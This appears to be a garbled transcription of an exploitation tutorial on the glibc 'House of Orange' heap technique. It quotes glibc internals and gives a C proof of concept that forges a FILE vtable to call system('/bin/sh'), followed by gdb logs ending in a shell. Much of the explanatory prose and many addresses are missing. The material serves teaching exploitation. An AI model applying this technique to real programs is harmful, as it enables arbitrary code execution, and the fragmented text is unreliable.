Excuse the ads! We need some help to keep our site up.

Transcription

1 House of Orange Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 3 Explanation of vulnerability 3.1 Add Free chunk to Unsorted bin 3.2 Unsorted bin attack 3.3 Call _IO_flush_all_lockp() 3.4 _IO_flush_all_lockp() 3.5 Struct _IO_FILE_plus struct _IO_FILE struct _IO_jump_t 3.6 struct _IO_wide_data *_wide_data 4 Example 4.1 Files 4.2 Source code 4.3 Exploit flow 4.4 Debugging 5 Related information Conditions. Top chunk. Top chunk. Top chunk Free chunk. Free chunk. Exploit plan. Add Free chunk to Unsorted bin 1 Heap. Top chunk. Top chunk + size. Top chunk prev_inuse. Ex) Top chunk : 0x20c01, Overwrite to value : 0xc00 + 0x1 = 0xc01 Top chunk Heap. Malloc sysmalloc. sysmalloc() _int_free() "Top chunk - 0x8" Unsorted bin. "Top chunk" Free chunk. Write to " Fake struct _IO_FILE_plus", " Fake struct _IO_wide_data" Free chunk " Fake struct _IO_FILE_plus", "Fake struct _IO_wide_data". Fake "struct _IO_FILE_plus" _mode = '0' vtable = "Fake vtable address" _wide_data = "Fake struct _IO_wide_data" Fake "struct _IO_wide_data" Fake "struct _IO_FILE_plus".

2 _IO_flush_all_lockp() "fp" "_freeres_list", "_freeres_buf". fp_wide_data fp_offset. fp _freeres_list = _wide_data->_io_write_ptr fp_freeres_buf = _wide_data->_io_write_base Unsorted bin attack Free chunk bk "&_IO_list_all - 0x16". Free chunk smallbin[4] Free chunk size. : 90 ~ 98 Heap. House of orange(?) _int_malloc() "_IO_list_all" "main_arena.top". _int_malloc() smallbin[4] Free chunk. _int_malloc() _IO_flush_all_lockp(). _IO_flush_all_lockp() "_IO_list_all" (main_arena). _IO_flush_all_lockp() "fp = fp_chain" fp. fp "Fake struct _IO_FILE_plus". _IO_flush_all_lockp() fp _IO_OVERFLOW. _IO_list_all->vtable->_IO_overflow_t _IO_OVERFLOW : fp + 0x60(vtable) + 0x18(_IO_overflow_t) = Explanation of vulnerability Add Free chunk to Unsorted bin sysmalloc() _int_free() Unsorted bin free chunk. Top chunk Heap, _int_malloc() sysmalloc() Heap. sysmalloc() _int_free(). Top chunk + size. Top chunk prev_inuse. malloc.c /* If not the first time through, we require old_size to be at least MINSIZE and to have prev_inuse set. */ assert ((old_top == initial_top (av) && old_size == 0) ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)); /* Precondition: not enough current space to satisfy nb request */ assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE)); Unsorted bin attack unsorted bin attack Call _IO_flush_all_lockp() glibc _int_malloc(). _int_malloc() malloc_printerr() libc_message FI_abort() _IO_flush_all_lockp() "House of Orange" _IO_flush_all_lockp().

3 malloc_printerr(). malloc.c for (;; ) int iters = 0; while ((victim = unsorted_chunks (av)->bk)!= unsorted_chunks (av)) bck = victim->bk; if ( builtin_expect (victim->size <= 2 * SIZE_SZ, 0) builtin_expect (victim->size > av->system_mem, 0)) malloc_printerr (check_action, "malloc(): memory corruption", chunk2mem (victim), av); size = chunksize (victim); _IO_flush_all_lockp(). line 792 : "_IO_OVERFLOW()" system(). line 788, 789 : "_IO_OVERFLOW()". line 806 : "fp" Fake "_IO_FILE_plus". "fp". Top chunk Unsorted bin attack "_IO_list_all", main_arena., "fp" main_arena, " fp = fp_chain" Fake "_IO_FILE_plus". _IO_flush_all_lockp() "fp" _IO_OVERFLOW(). int _IO_flush_all_lockp (int do_lock) int result = 0; struct _IO_FILE *fp; int last_stamp; genops.c #ifdef _IO_MTSAFE_IO libc_cleanup_region_start (do_lock, flush_cleanup, NULL); if (do_lock) _IO_lock_lock (list_all_lock); #endif last_stamp = _IO_list_all_stamp; fp = (_IO_FILE *) _IO_list_all; while (fp!= NULL) run_fp = fp; if (do_lock) _IO_flockfile (fp); if (((fp->_mode <= 0 && fp->_io_write_ptr > fp->_io_write_base) #if defined _LIBC defined _GLIBCPP_USE_WCHAR_T (_IO_vtable_offset (fp) == 0

4 #endif && fp->_mode > 0 && (fp->_wide_data->_io_write_ptr > fp->_wide_data->_io_write_base)) ) && _IO_OVERFLOW (fp, EOF) == EOF) result = EOF; if (do_lock) _IO_funlockfile (fp); run_fp = NULL; } if (last_stamp!= _IO_list_all_stamp) /* Something was added to the list. Start all over again. */ fp = (_IO_FILE *) _IO_list_all; last_stamp = _IO_list_all_stamp; } else fp = fp->_chain; #ifdef _IO_MTSAFE_IO if (do_lock) _IO_lock_unlock (list_all_lock); libc_cleanup_region_end (0); #endif } return result; Struct _IO_FILE_plus "_IO_list_all" "_IO_FILE_plus". "_IO_FILE_plus". _IO_FILE _IO_jump_t libiop.h extern struct _IO_FILE_plus *_IO_list_all; struct _IO_FILE_plus _IO_FILE file; const struct _IO_jump_t *vtable; }; libiop.h

5 struct _IO_FILE libio.h - struct _IO_FILE struct _IO_FILE int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */ char* _IO_read_ptr; /* Current read pointer */ char* _IO_read_end; /* End of get area. */ char* _IO_read_base; /* Start of putback+get area. */ char* _IO_write_base; /* Start of put area. */ char* _IO_write_ptr; /* Current put pointer. */ char* _IO_write_end; /* End of put area. */ char* _IO_buf_base; /* Start of reserve area. */ char* _IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ char *_IO_backup_base; /* Pointer to first valid character of backup area */ char *_IO_save_end; /* Pointer to end of non-current get area. */ struct _IO_marker *_markers; struct _IO_FILE *_chain; int _fileno; #if 0 int _blksize; #else int _flags2; #endif _IO_off_t _old_offset; /* This used to be _offset but it's too small. */ #define HAVE_COLUMN /* temporary */ /* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; /* char* _save_gptr; char* _save_egptr; */ _IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE }; struct _IO_jump_t.

6 _IO_overflow_t _IO_OVERFLOW(). libiop.h - struct _IO_jump_t struct _IO_jump_t JUMP_FIELD(size_t, dummy); JUMP_FIELD(size_t, dummy2); JUMP_FIELD(_IO_finish_t, finish); JUMP_FIELD(_IO_overflow_t, overflow); JUMP_FIELD(_IO_underflow_t, underflow); JUMP_FIELD(_IO_underflow_t, uflow); JUMP_FIELD(_IO_pbackfail_t, pbackfail); /* showmany */ JUMP_FIELD(_IO_xsputn_t, xsputn); JUMP_FIELD(_IO_xsgetn_t, xsgetn); JUMP_FIELD(_IO_seekoff_t, seekoff); JUMP_FIELD(_IO_seekpos_t, seekpos); JUMP_FIELD(_IO_setbuf_t, setbuf); JUMP_FIELD(_IO_sync_t, sync); JUMP_FIELD(_IO_doallocate_t, doallocate); JUMP_FIELD(_IO_read_t, read); JUMP_FIELD(_IO_write_t, write); JUMP_FIELD(_IO_seek_t, seek); JUMP_FIELD(_IO_close_t, close); JUMP_FIELD(_IO_stat_t, stat); JUMP_FIELD(_IO_showmanyc_t, showmanyc); JUMP_FIELD(_IO_imbue_t, imbue); #if 0 get_column; set_column; #endif }; struct _IO_wide_data *_wide_data. _wide_data. genops.c #if defined _LIBC defined _GLIBCPP_USE_WCHAR_T (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_io_write_ptr > fp->_wide_data->_io_write_base)) #endif struct _IO_wide_data *_wide_data libio.h

7 libio.h /* Extra data for wide character streams. */ struct _IO_wide_data wchar_t *_IO_read_ptr; /* Current read pointer */ wchar_t *_IO_read_end; /* End of get area. */ wchar_t *_IO_read_base; /* Start of putback+get area. */ wchar_t *_IO_write_base; /* Start of put area. */ wchar_t *_IO_write_ptr; /* Current put pointer. */ wchar_t *_IO_write_end; /* End of put area. */ wchar_t *_IO_buf_base; /* Start of reserve area. */ wchar_t *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */ wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */ wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */ mbstate_t _IO_state; mbstate_t _IO_last_state; struct _IO_codecvt _codecvt; wchar_t _shortbuf[1]; const struct _IO_jump_t *_wide_vtable; }; Example Files Source code

8 #include <stdio.h> #include <stdlib.h> #include <string.h> int winner ( char *ptr); int main() char *p1, *p2; size_t io_list_all, *top; p1 = malloc(0x400-16); top = (size_t *) ( (char *) p1 + 0x400-16); top[1] = 0xc01; p2 = malloc(0x1000); io_list_all = top[2] + 0x9a8; top[3] = io_list_all - 0x10; memcpy( ( char *) top, "/bin/sh\x00", 8); top[1] = 0x61; top[24] = 1; top[21] = 2; top[22] = 3; top[20] = (size_t) &top[18]; top[15] = (size_t) &winner; top[27] = (size_t ) &top[12]; malloc(10); } return 0; int winner(char *ptr) system(ptr); return 0; } Exploit flow

9 House of Orange Debugging Break point. 0x4005e3 : malloc() 0x40060e : malloc() 0x4006d9 : malloc() gdb-peda$ b *0x4005e3 Breakpoint 1 at 0x4005e3 gdb-peda$ b *0x40060e Breakpoint 2 at 0x40060e gdb-peda$ b *0x4006d9 Breakpoint 3 at 0x4006d9 Break points Heap Top chunk. Top chunk : 0x20c01

10 malloc(0x3f0) gdb-peda$ r Starting program: /home/lazenca0x0/documents/definition/heap/houseoforange /orange Breakpoint 1, 0x e3 in main () gdb-peda$ ni 0x e8 in main () gdb-peda$ i r rax rax 0x x gdb-peda$ x/2gx 0x x10 0x602000: 0x x gdb-peda$ x/2gx 0x x400 0x602400: 0x x c01 gdb-peda$ Top chunk Top chunk(0x602400) unsorted bin. main_arena. top 0x x unsorted bin[0] 0x7ffff7dd1b78 0x unsorted bin[1] 0x7ffff7dd1b78 0x Top chunk(0x602400) free chunk.

11 gdb-peda$ c Continuing. Overwrite a 0xc01 on Top Chunk and malloc(0x1000) Breakpoint 2, 0x e in main () gdb-peda$ x/2gx 0x x400 0x602400: 0x x c01 gdb-peda$ p main_arena.top $1 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[0] $2 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[1] $3 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ ni 0x in main () gdb-peda$ x/2gx 0x x400 0x602400: 0x x be1 gdb-peda$ p main_arena.top $4 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[0] $5 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[1] $6 = (mchunkptr) 0x gdb-peda$ free chunk Fake "struct _IO_wide_data", "struct _IO_FILE_plus". free chunk bk _IO_list_all main_arena. _IO_list_all : 0x7ffff7dd2540 <_IO_2_1_stderr_> free chunk size smallbin[4]. smallbin[4] heap : 90 ~ 98 _IO_FILE_plus() "_IO_flush_all_lockp+0" Break point.

12 Write to Fake fp and Malloc(10) gdb-peda$ c Continuing. Breakpoint 3, 0x d9 in main () gdb-peda$ x/30gx 0x x602400: 0x f6e69622f 0x x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 0x602420: 0x x x602430: 0x x x602440: 0x x x602450: 0x x x602460: 0x x x602470: 0x x e5 0x602480: 0x x x602490: 0x x x6024a0: 0x x x6024b0: 0x x x6024c0: 0x x x6024d0: 0x x x6024e0: 0x x gdb-peda$ p _IO_list_all $8 = (struct _IO_FILE_plus *) 0x7ffff7dd2540 <_IO_2_1_stderr_> gdb-peda$ disassemble _IO_flush_all_lockp Dump of assembler code for function _IO_flush_all_lockp: 0x00007ffff7a89020 <+0>: push r15... End of assembler dump. gdb-peda$ b *0x00007ffff7a89020 Breakpoint 4 at 0x7ffff7a89020: file genops.c, line 760. gdb-peda$ _int_malloc() 0x smallbin[4]. "fp_chain" 0x "fp = fp_chain" "*_IO_flush_all_lockp+490" Break point. _int_free() gdb-peda$ c Continuing. *** Error in `/home/lazenca0x0/documents/definition/heap/houseoforange /orange1': malloc(): memory corruption: 0x00007ffff7dd2520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e] /lib/x86_64-linux-gnu/libc.so.6( libc_malloc+0x54)[0x7ffff7a91184] /home/lazenca0x0/documents/definition/heap/houseoforange/orange1[0x4006de] /lib/x86_64-linux-gnu/libc.so.6( libc_start_main+0xf0)[0x7ffff7a2d830] /home/lazenca0x0/documents/definition/heap/houseoforange/orange1[0x400509] ======= Memory map: ======== r-xp : /home/lazenca0x0/documents/definition/heap/houseoforange/orange1

13 r--p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p :00 0 [heap] 7ffff ffff rw-p :00 0 7ffff ffff p :00 0 7ffff77f7000-7ffff780d000 r-xp : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff780d000-7ffff7a0c p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0c000-7ffff7a0d000 rw-p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0d000-7ffff7bcd000 r-xp : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p :00 0 7ffff7dd7000-7ffff7dfd000 r-xp : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fd5000-7ffff7fd8000 rw-p :00 0 7ffff7ff5000-7ffff7ff8000 rw-p :00 0 7ffff7ff8000-7ffff7ffa000 r--p :00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp :00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p :00 0 7ffffffde000-7ffffffff000 rw-p :00 0 [stack] ffffffffff ffffffffff r-xp :00 0 [vsyscall] Breakpoint 4, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: genops.c: No such file or directory. gdb-peda$ p _IO_list_all $9 = (struct _IO_FILE_plus *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[10] $10 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[11] $11 = (mchunkptr) 0x gdb-peda$ b *_IO_flush_all_lockp+490 Breakpoint 5 at 0x7ffff7a8920a: file genops.c, line 800. gdb-peda$

14 "fp = fp_chain" smallbin[4](0x602400) "fp". 0x7ffff7dd1b78 + 0x68 = 0x7ffff7dd1be00x gdb-peda$ c Continuing. fp = fp->_chain; Breakpoint 5, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ x/i _IO_flush_all_lockp+490 => 0x7ffff7a8920a <_IO_flush_all_lockp+490>: mov rbx,qword PTR [rbx+0x68] gdb-peda$ p fp $14 = (struct _IO_FILE *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ ni 773 in genops.c gdb-peda$ p fp $15 = (struct _IO_FILE *) 0x gdb-peda$ i r rbx rbx 0x x gdb-peda$ b *_IO_flush_all_lockp+356 Breakpoint 6 at 0x7ffff7a89184: file genops.c, line 786. gdb-peda$ "fp" vtable. vtable address : 0x xd8 = 0x6024d8 0x _IO_overflow_t : 0x x18 = 0x x4006e5

15 gdb-peda$ c Continuing. _IO_OVERFLOW Breakpoint 6, 0x7ffff7a89184 in _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ x/4i 0x7ffff7a89184 => 0x7ffff7a89184 <_IO_flush_all_lockp+356>: mov rax,qword PTR [rbx+0xd8] 0x7ffff7a8918b <_IO_flush_all_lockp+363>: mov esi,0xffffffff 0x7ffff7a89190 <_IO_flush_all_lockp+368>: mov rdi,rbx 0x7ffff7a89193 <_IO_flush_all_lockp+371>: call QWORD PTR [rax+0x18] gdb-peda$ i r rbx rbx 0x x gdb-peda$ x/gx 0x xd8 0x6024d8: 0x gdb-peda$ x/s 0x x602400: "/bin/sh" gdb-peda$ x/gx 0x x18 0x602478: 0x e5 gdb-peda$ x/i 0x4006e5 0x4006e5 <winner>: push rbp gdb-peda$ "/bin/bash".

16 gdb-peda$ c Continuing. call the _IO_OVERFLOW Breakpoint 8, 0x00007ffff7a89193 in _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ ni [New process 48247] process is executing new program: /bin/dash Error in re-setting breakpoint 5: No symbol table is loaded. Use the "file" command. Error in re-setting breakpoint 6: No symbol table is loaded. Use the "file" command. Error in re-setting breakpoint 7: No symbol table is loaded. Use the "file" command. Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x4005e3 Cannot insert breakpoint 2. Cannot access memory at address 0x40060e Cannot insert breakpoint 3. Cannot access memory at address 0x4006d9 Cannot insert breakpoint 4. Cannot access memory at address 0x7ffff7a89020 Cannot insert breakpoint 8. Cannot access memory at address 0x7ffff7a89193 gdb-peda$ Error Shell. Get shell! lazenca0x0@ubuntu:~/documents/definition/heap/houseoforange$./orange1 *** Error in `./orange1': malloc(): memory corruption: 0x00007fa48f8c8520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa48f57a7e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fa48f58513e] /lib/x86_64-linux-gnu/libc.so.6( libc_malloc+0x54)[0x7fa48f587184]./orange1[0x4006de] /lib/x86_64-linux-gnu/libc.so.6( libc_start_main+0xf0)[0x7fa48f523830]./orange1[0x400509] ======= Memory map: ======== r-xp : /home/lazenca0x0/documents/definition/heap/houseoforange/orange r--p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p :

17 /home/lazenca0x0/documents/definition/heap/houseoforange/orange1 0211d rw-p :00 0 [heap] 7fa fa rw-p :00 0 7fa fa48c p :00 0 7fa48f2ed000-7fa48f r-xp : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f rw-p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f6c3000 r-xp : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f6c3000-7fa48f8c p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c3000-7fa48f8c7000 r--p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c7000-7fa48f8c9000 rw-p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c9000-7fa48f8cd000 rw-p :00 0 7fa48f8cd000-7fa48f8f3000 r-xp : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48facf000-7fa48fad2000 rw-p :00 0 7fa48faef000-7fa48faf2000 rw-p :00 0 7fa48faf2000-7fa48faf3000 r--p : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48faf3000-7fa48faf4000 rw-p : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48faf4000-7fa48faf5000 rw-p :00 0 7ffca3f1b000-7ffca3f3c000 rw-p :00 0 [stack] 7ffca3fd1000-7ffca3fd3000 r--p :00 0 [vvar] 7ffca3fd3000-7ffca3fd5000 r-xp :00 0 [vdso] ffffffffff ffffffffff r-xp :00 0 [vsyscall] $ ls hell orange1 orange1.c peda-session-dash.txt peda-session-orange1.txt peda-session-test.txt test $ id uid=1001(lazenca0x0) gid=1001(lazenca0x0) groups=1001(lazenca0x0) $ Related information

18